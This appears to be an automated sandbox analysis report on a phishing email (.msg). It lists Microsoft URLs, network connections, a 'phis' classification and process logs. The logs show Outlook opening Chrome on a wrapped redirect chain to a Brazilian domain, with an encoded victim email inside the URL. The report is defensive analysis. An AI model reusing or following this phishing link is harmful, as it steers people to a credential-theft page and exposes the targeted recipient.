            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ncus.pagecontentsync.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://notification.m365.svc.cloud.microsoft/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://notification.m365.svc.cloud.microsoft/PushNotifications.Register
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officeapps.live.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officepyservice.office.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officepyservice.office.net/service.functionality
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://onedrive.live.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://otelrules.azureedge.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://otelrules.svc.static.microsoft
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office365.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office365.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://outlook.office365.com/connectors
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pages.store.office.com/review/query
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://planner.cloud.microsoft
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://powerlift.acompli.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://pushchannel.1drv.ms
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://res.cdn.office.net
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://res.cdn.office.net/polymer/models
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://service.officepy.microsoftusercontent.com/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://service.powerapps.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://settings.outlook.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://shell.suite.office.com:1443
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://skyapi.live.net/Activity/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://staging.cortana.ai
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-1
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-2
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-100
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-150
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-hc-200
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-light-
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://store.office.cn/addinstemplate
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://store.office.de/addinstemplate
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://substrate.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://syncservice.o365syncservice.com/&quot;
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://templatesmetadata.office.net/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://web.microsoftstream.com/video/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://webshell.suite.office.com
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://wus2.contentsync.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://wus2.pagecontentsync.
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://www.odwebp.svc.ms
            Source: 0CDD6D76-FE6D-4BCF-84FA-1D3949395ABA.1.drString found in binary or memory: https://www.yammer.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: classification engineClassification label: mal84.phis.winMSG@20/63@32/8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241205T0223450049-5604.etlJump to behavior
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\SBO Catch up call pf.msg"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "70B31B44-41D0-4A8A-9A35-9C4EDE4E08A3" "394EF357-1A0B-4E1A-BBCB-9F7F5C0CEAAD" "5604" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,7133077948100089436,13748270433531493616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "70B31B44-41D0-4A8A-9A35-9C4EDE4E08A3" "394EF357-1A0B-4E1A-BBCB-9F7F5C0CEAAD" "5604" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fgoogle.dz%2furl%3fq%3dnrnq5JLi6z3yh%26rct%3dtTPvvq6xRyj7Y00xDjnlx9kIjusucT%26sa%3dt%26url%3damp%2fs%252falvoradavisual.com.br%252fyoya%2fcjbh%2fa2xhdXMubWFkZXJAc2JvLmNvLmF0%c3%a3%e2%82%ac%e2%80%9a%24%24%24%c3%a3%e2%82%ac%e2%80%9a&c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,7133077948100089436,13748270433531493616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
